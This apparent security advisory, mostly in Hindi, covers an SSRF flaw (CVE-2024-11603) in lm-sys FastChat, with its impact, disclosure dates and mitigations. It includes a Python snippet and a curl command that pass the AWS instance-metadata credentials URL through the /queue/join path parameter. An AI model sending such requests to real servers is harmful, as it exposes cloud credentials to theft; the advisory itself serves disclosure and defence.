FastChat सर्वर-साइड रिक्वेस्ट फोर्जिंग भेद्यता

यह SSRF भेद्यता हमलावरों को आंतरिक नेटवर्क संसाधनों तक अनधिकृत पहुँच प्राप्त करने की अनुमति देती है। वे AWS मेटाडेटा एंडपॉइंट जैसे आंतरिक सेवाओं तक पहुँच सकते हैं, जिससे संवेदनशील जानकारी उजागर हो सकती है, जैसे कि AWS क्रेडेंशियल या अन्य गोपनीय डेटा। हमलावर आंतरिक सर्वरों पर दुर्भावनापूर्ण अनुरोध भी भेज सकते हैं, जिससे संभावित रूप से सिस्टम से समझौता हो सकता है और डेटा चोरी हो सकता है। इस भेद्यता का उपयोग आंतरिक सेवाओं को स्कैन करने, संवेदनशील डेटा को उजागर करने और सिस्टम को नियंत्रित करने के लिए किया जा सकता है। यह भेद्यता विशेष रूप से उन वातावरणों में गंभीर है जहाँ fschat आंतरिक नेटवर्क के पीछे तैनात है और बाहरी दुनिया के संपर्क में नहीं है।

Organizations deploying fastchat for language model serving, particularly those running on AWS infrastructure, are at significant risk. Shared hosting environments where fastchat instances share network access with other tenants are also particularly vulnerable, as a successful SSRF attack could potentially compromise other services on the same host.

• python / server:

import requests
import urllib.parse

def check_ssrf(url):
    try:
        parsed_url = urllib.parse.urlparse(url)
        if parsed_url.scheme in ('http', 'https'):
            response = requests.get(url, timeout=5)
            print(f"URL: {url}, Status Code: {response.status_code}")
        else:
            print(f"Invalid URL scheme: {url}")
    except requests.exceptions.RequestException as e:
        print(f"Error accessing {url}: {e}")

# Example usage - check AWS metadata endpoint
check_ssrf('http://169.254.169.254/latest/meta-data/iam/security-credentials/')

• generic web:

curl -I 'http://your-fastchat-server/queue/join?path=http://169.254.169.254/latest/meta-data/iam/security-credentials/'

1. 2025-03-20Disclosure

   disclosure

1. आरक्षित2024-11-21
2. प्रकाशित2025-03-20
3. संशोधित2025-03-21
4. EPSS अद्यतन2026-04-02

CVE-2024-11603 को कम करने के लिए, lm-sys/fastchat के नवीनतम संस्करण में तुरंत अपडेट करना महत्वपूर्ण है। यदि अपग्रेड करना संभव नहीं है, तो एक अस्थायी समाधान के रूप में, आप एक वेब एप्लिकेशन फ़ायरवॉल (WAF) या प्रॉक्सी का उपयोग करके /queue/join? एंडपॉइंट पर आने वाले अनुरोधों को फ़िल्टर कर सकते हैं, ताकि केवल विश्वसनीय स्रोतों से अनुरोधों को ही अनुमति दी जाए। इसके अतिरिक्त, आप आंतरिक नेटवर्क संसाधनों तक पहुँच को सीमित करने के लिए नेटवर्क एक्सेस नियंत्रण सूचियों (ACLs) को कॉन्फ़िगर कर सकते हैं। यह सुनिश्चित करें कि fschat चलाने वाले सर्वर पर कोई अनावश्यक पोर्ट खुले नहीं हैं। नवीनतम सुरक्षा अपडेट के लिए lm-sys/fastchat के आधिकारिक दस्तावेज़ों की जाँच करते रहें।